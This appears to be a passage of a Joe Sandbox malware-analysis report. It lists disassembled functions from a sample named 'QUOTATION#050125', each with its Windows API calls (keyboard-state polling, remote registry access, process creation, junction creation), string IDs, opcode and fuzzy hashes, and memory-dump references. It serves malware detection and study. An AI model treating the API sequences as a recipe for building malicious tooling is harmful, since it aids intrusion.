                                                                                      • Opcode ID: 4a060a5a6ba761a35917cdb94e5adba54827bc5c7a44a6de5f4502540710a681
                                                                                      • Instruction ID: 4a78b3fe1fae012fc03417ef33207089292cc313ab8526b2cb5d0c57e93de223
                                                                                      • Opcode Fuzzy Hash: 4a060a5a6ba761a35917cdb94e5adba54827bc5c7a44a6de5f4502540710a681
                                                                                      • Instruction Fuzzy Hash: BD615B31512705EFCB359F14D958B69B7F1FB40316F14952EE0429BAA0CB72A9D0DFA0
                                                                                      Function 000D9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9944: GetWindowLongW.USER32(?,000000EB), ref: 000D9952
                                                                                      • GetSysColor.USER32(0000000F), ref: 000D9862
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ColorLongWindow
                                                                                      • String ID:
                                                                                      • API String ID: 259745315-0
                                                                                      • Opcode ID: 96ca41e5ccdc8fe27e111c38c50eef29cd3f8d4002b39584020aa135d6538297
                                                                                      • Instruction ID: 14cfb096628b35d54e8bcd075968483ad8bad871b7f520c589705faf64c6e289
                                                                                      • Opcode Fuzzy Hash: 96ca41e5ccdc8fe27e111c38c50eef29cd3f8d4002b39584020aa135d6538297
                                                                                      • Instruction Fuzzy Hash: 35418331104740EFDB205F389C84BB977A6AB46731F144616F9A28B3E1DB319D81EB70
                                                                                      Function 0012365B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0012369C
                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00123797
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0012380C
                                                                                      • GetDlgCtrlID.USER32(?), ref: 0012385D
                                                                                      • GetWindowRect.USER32(?,?), ref: 00123882
                                                                                      • GetParent.USER32(?), ref: 001238A0
                                                                                      • ScreenToClient.USER32(00000000), ref: 001238A7
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00123921
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0012395D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                      • String ID: %s%u
                                                                                      • API String ID: 1412819556-679674701
                                                                                      • Opcode ID: 135b83dd3335524cf894bf577f3feb09718d20ee3008f27bca49594049512905
                                                                                      • Instruction ID: 480a31db8b32b5e535182d0387b0e098785cb1b9e162939a7e21de1952dec1e7
                                                                                      • Opcode Fuzzy Hash: 135b83dd3335524cf894bf577f3feb09718d20ee3008f27bca49594049512905
                                                                                      • Instruction Fuzzy Hash: 1E91E371204316AFDB08DF24D884BEAF7A9FF45304F004619F9A9D6190DB34EAA5CB91
                                                                                      Function 001296E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0010F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00129717
                                                                                      • LoadStringW.USER32(00000000,?,0010F7F8,00000001), ref: 00129720
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0010F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00129742
                                                                                      • LoadStringW.USER32(00000000,?,0010F7F8,00000001), ref: 00129745
                                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00129866
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                      • API String ID: 4072794657-2268648507
                                                                                      • Opcode ID: 61d58d480abb0f0b3b060587aff1ba0bb24f1e9a1228b46ed6f0d989b830fdd4
                                                                                      • Instruction ID: 5876df78d53a17464e70d115a336cc4da9f8bdc0eb4f0bc5b85f1fca4be8a5fe
                                                                                      • Opcode Fuzzy Hash: 61d58d480abb0f0b3b060587aff1ba0bb24f1e9a1228b46ed6f0d989b830fdd4
                                                                                      • Instruction Fuzzy Hash: 0A413D72900219AADF14FBE4DD86EEE7778AF15340F504129F60672092EF356F58CB61
                                                                                      Function 001206DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001207A2
                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001207BE
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001207DA
                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00120804
                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0012082C
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00120837
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0012083C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                      • API String ID: 3030280669-22481851
                                                                                      • Opcode ID: 4bb11b2108d3daf2a92c0ab430004c1664d622db696f67f984437899e420f64a
                                                                                      • Instruction ID: de6f8bf96aeee6857be974838c53e2b797d65c6300a1f1f802d0518801f81bc0
                                                                                      • Opcode Fuzzy Hash: 4bb11b2108d3daf2a92c0ab430004c1664d622db696f67f984437899e420f64a
                                                                                      • Instruction Fuzzy Hash: E341E476D10229AFDB11EFA4DC85DEEB778FF48354B044129F901A71A2EB309E54CBA0
                                                                                      Function 00133D1E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00133D40
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00133D9D
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00133DBE
                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00133DCE
                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00133E55
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00133E60
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00133E6B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                      • String ID: :$\$\??\%s
                                                                                      • API String ID: 3827137101-3457252023
                                                                                      • Opcode ID: e2d8c329fcc4c14f5a61f8cb2a95ba4b11d595abf7eba5e790a9bfe804e0bc0c
                                                                                      • Instruction ID: ef5e767c80928eb84f85cfa2056a9666bc53ce23669ed370d4d7d9ffa64e9293
                                                                                      • Opcode Fuzzy Hash: e2d8c329fcc4c14f5a61f8cb2a95ba4b11d595abf7eba5e790a9bfe804e0bc0c
                                                                                      • Instruction Fuzzy Hash: 6F31A171900209ABDB219FA0DC49FEB37BDEF88701F5040B6F619E6061EB7497848B68
                                                                                      Function 00153F98 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0015403B
                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00154042
                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00154055
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0015405D
                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00154068
                                                                                      • DeleteDC.GDI32(00000000), ref: 00154072
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0015407C
                                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00154092
                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 0015409E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                      • String ID: static
                                                                                      • API String ID: 2559357485-2160076837
                                                                                      • Opcode ID: 091d854a50c51e37b2030eab73277393d9dea0721da431e4c0a3261cf0f54101
                                                                                      • Instruction ID: 7968fc448a6dc3f2a670f2fc497576012108683754f6bf4468fa173b176815a2
                                                                                      • Opcode Fuzzy Hash: 091d854a50c51e37b2030eab73277393d9dea0721da431e4c0a3261cf0f54101
                                                                                      • Instruction Fuzzy Hash: 32317C32500315EFDF219FA4DC48FDA3B69EF0D366F110211FA25AA1A0C775D895DB90
                                                                                      Function 0014AFF9 Relevance: 16.9, APIs: 11, Instructions: 418processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0014B1B0
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0014B1D4
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0014B214
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0014B236
                                                                                        • Part of subcall function 001305A7: GetStdHandle.KERNEL32(000000F6), ref: 001305C6
                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0014B3B6
                                                                                      • GetLastError.KERNEL32(00000000), ref: 0014B407
                                                                                      • CloseHandle.KERNEL32(?), ref: 0014B439
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014B44A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014B45C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014B46E
                                                                                      • CloseHandle.KERNEL32(?), ref: 0014B4E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Handle$Close$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3101636085-0
                                                                                      • Opcode ID: 71d7d2dd986eb6afa18a99102ee9752f0e67e25649aad15617534db89fda1b4d
                                                                                      • Instruction ID: 57007b457383b4ece040b3c5ecc82f850602d4a5b9f61c2d314e7d55f49cdb79
                                                                                      • Opcode Fuzzy Hash: 71d7d2dd986eb6afa18a99102ee9752f0e67e25649aad15617534db89fda1b4d
                                                                                      • Instruction Fuzzy Hash: 4BF18B316083409FC714EF24C891B6EBBE5BF85714F18855DF89A9B2A2CB71EC45CB92
                                                                                      Function 00137A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 00137AF3
                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00137B8F
                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00137BA3
                                                                                      • CoCreateInstance.OLE32(0015FD08,00000000,00000001,00186E6C,?), ref: 00137BEF
                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00137C74
                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00137CCC
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00137D57
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00137D7A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00137D81
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00137DD6
                                                                                      • CoUninitialize.OLE32 ref: 00137DDC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 2762341140-0
                                                                                      • Opcode ID: fa385094b478f4a90f509c3037ff5c8b2216a43a172213ca55a33b73ae326f72
                                                                                      • Instruction ID: f0c3504625483b165e4b9c42c63b18c625737d6a8c6a15e751a433dda88d5b96
                                                                                      • Opcode Fuzzy Hash: fa385094b478f4a90f509c3037ff5c8b2216a43a172213ca55a33b73ae326f72
                                                                                      • Instruction Fuzzy Hash: 17C1EA75A04209AFCB14DFA4C884DAEBBF9FF48314F148499E8199B662D731EE45CB90
                                                                                      Function 0015541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00155504
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00155515
                                                                                      • CharNextW.USER32(00000158), ref: 00155544
                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00155585
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0015559B
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001555AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CharNext
                                                                                      • String ID:
                                                                                      • API String ID: 1350042424-0
                                                                                      • Opcode ID: 6e2bb8ecdbd72e361acbca0e8c431f025595fdaa690cd0dfe625722e8ca9b562
                                                                                      • Instruction ID: 7ee0a0b14d8fb4fd04923b4e9f5abff2cb74e370b505bf5d8549d86ed8c4a423
                                                                                      • Opcode Fuzzy Hash: 6e2bb8ecdbd72e361acbca0e8c431f025595fdaa690cd0dfe625722e8ca9b562
                                                                                      • Instruction Fuzzy Hash: 37617C30904609EFDF109F94CC95AFE7BBAFB09726F104145F935AE290E7749A88DB60
                                                                                      Function 0011FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0011FAAF
                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 0011FB08
                                                                                      • VariantInit.OLEAUT32(?), ref: 0011FB1A
                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0011FB3A
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0011FB8D
                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 0011FBA1
                                                                                      • VariantClear.OLEAUT32(?), ref: 0011FBB6
                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 0011FBC3
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0011FBCC
                                                                                      • VariantClear.OLEAUT32(?), ref: 0011FBDE
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0011FBE9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                      • String ID:
                                                                                      • API String ID: 2706829360-0
                                                                                      • Opcode ID: c6c68d8941ae88bd72afc0fb0589d402170e194057bb1ef3e655bba06954b599
                                                                                      • Instruction ID: b4cb496ccc4a2975796af34420fc9f6ad9b866fa8f6d292d2dd75eb1752ee07c
                                                                                      • Opcode Fuzzy Hash: c6c68d8941ae88bd72afc0fb0589d402170e194057bb1ef3e655bba06954b599
                                                                                      • Instruction Fuzzy Hash: E0415F75A00319DFCB04DF64D854DEEBBB9FF58345F008079E945AB261DB30A986CBA0
                                                                                      Function 00129C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?), ref: 00129CA1
                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00129D22
                                                                                      • GetKeyState.USER32(000000A0), ref: 00129D3D
                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00129D57
                                                                                      • GetKeyState.USER32(000000A1), ref: 00129D6C
                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00129D84
                                                                                      • GetKeyState.USER32(00000011), ref: 00129D96
                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00129DAE
                                                                                      • GetKeyState.USER32(00000012), ref: 00129DC0
                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00129DD8
                                                                                      • GetKeyState.USER32(0000005B), ref: 00129DEA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: State$Async$Keyboard
                                                                                      • String ID:
                                                                                      • API String ID: 541375521-0
                                                                                      • Opcode ID: 1b620b3900e70a997cfca1c9bf225d2bec416e30a6ca06fcfdb947a8610949a0
                                                                                      • Instruction ID: 7c9cd0d0256c75f54ab36da518254ac273a8ebc6ac2c2c9a1e88b229d29df6eb
                                                                                      • Opcode Fuzzy Hash: 1b620b3900e70a997cfca1c9bf225d2bec416e30a6ca06fcfdb947a8610949a0
                                                                                      • Instruction Fuzzy Hash: 0741FC345047DE6DFF348BA8E4043B5BEE06F11344F04805ED6C65A5C2E7A499F4D7A2
                                                                                      Function 001344C0 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 309COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharLowerBuffW.USER32(00000000,00000000,0015CC08), ref: 00134527
                                                                                      • GetDriveTypeW.KERNEL32(?,00186BF0,00000061), ref: 00134743
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharDriveLowerType
                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                      • API String ID: 2426244813-1000479233
                                                                                      • Opcode ID: a920066676022d3eb3e7a9198d15f02f9475ea183588fe8ea76fed8333a5a424
                                                                                      • Instruction ID: c103ab668acc3ceb852348c2e8eb574703daf677a8d59328495e2b5f83d6b7f0
                                                                                      • Opcode Fuzzy Hash: a920066676022d3eb3e7a9198d15f02f9475ea183588fe8ea76fed8333a5a424
                                                                                      • Instruction Fuzzy Hash: 51B122716083029FC710DF28C891AAEB7E4BFA5764F50491DF496D7292E730E944CB92
                                                                                      Function 00124954 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 253COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00124994
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 001249DA
                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 001249F7
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00124A64
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00124A9D
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00124AE6
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00124B20
                                                                                      • GetWindowRect.USER32(?,?), ref: 00124B8B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
